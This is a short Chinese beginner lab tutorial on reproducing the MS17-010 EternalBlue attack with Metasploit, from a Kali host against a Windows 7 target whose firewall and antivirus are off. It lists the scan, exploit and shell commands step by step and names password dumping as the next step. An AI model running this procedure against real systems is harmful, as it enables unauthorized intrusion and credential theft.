MS17-010 永恒之蓝复现（新手向）

一、实验环境：

        kali :192.168.0.109

        win7:  192.168.0.105  

        注：① net模式也可以。我这里网络模式为桥接，即与本机在同一个网段。 当由net切换到桥接时，kali会断网。可以参照下面的方法。https://blog.csdn.net/gw_csdn/article/details/84992696

                ② win7关闭防火墙，并且关闭杀软。（刚开始学，要求不高）

二、步骤

       0x1

                 kali启动        msfconsole 

        0x2 

                因为 永恒之蓝漏洞编号是ms17-010 ，所以在msf中搜索利用框架。

                执行  search ms17-010

        0x3

                切换到搜索模块

                use  auxiliary/scanner/smb/smb_ms17_010 

        0x4

                查看配置选项

                show options 

        0x5

                 设置扫描的网段。  这里在实验环境中，扫描 192.168.0.100-150 

                set rhosts 192.168.0.100-150 

        0x6

                设置线程，提高速度

                set threads 100

        0x7

                执行 run ，开始扫描

        0x8

                 检测到了带有漏洞的靶机，现在就利用攻击模块 

                use exploit/windows/smb/ms17_010_eternalblue    （tab键都可以补全）
        

         0x9

                查看配置选项  

                show options

        0x10

                 设置攻击对象。 

                set rhosts 192.168.0.105

         0x11

                执行一遍检查 check 

        0x12

                执行 run。拿下。

        

 

 试试进入 shell 

 可以进入，但是乱码了。乱码的问题可以用下面的命令解决 

chcp 65001

 

能直接进命令行了，那么接下来就是导出密码，开启端口，远程连接了。目前能力有限。后面补上。

交流qq：2368079178